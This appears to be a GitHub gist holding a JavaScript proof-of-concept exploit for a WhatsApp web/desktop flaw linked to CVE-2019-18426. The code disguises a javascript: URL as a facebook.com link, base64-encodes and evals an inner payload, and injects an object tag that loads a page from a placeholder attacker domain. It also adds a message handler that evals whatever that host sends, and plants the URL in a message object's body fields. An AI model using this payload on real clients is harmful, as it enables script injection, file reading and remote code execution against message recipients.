@galpx
Created August 11, 2020 10:05
WhatsApp FS read vuln post CVE-2019-18426
// Inner payload: a string of JavaScript that is decoded and evaluated once the outer javascript: URL runs.
// MY_MALICIOUS_DOMAIN and MY_PAYLOAD_IFRAME.html are placeholders left as in the original gist.
var payload = `
hard_expire_time.innerHTML +=
'<object data="https://MY_MALICIOUS_DOMAIN/MY_PAYLOAD_IFRAME.html" />';
onmessage=(e)=>{eval(JSON.parse(e.data))};
`;
// Outer payload: a javascript: URL whose leading string literal reads like a facebook.com link,
// followed by base64-decoding and eval of the inner payload.
payload = `javascript:"https://facebook.com";eval(atob("${btoa(payload)}"))`;
// Write the crafted URL into both the body and the matched-text fields of the message object `e`
// (`e` is assumed to be an already in-scope message object).
e.__x_body = e.__x_matchedText = payload;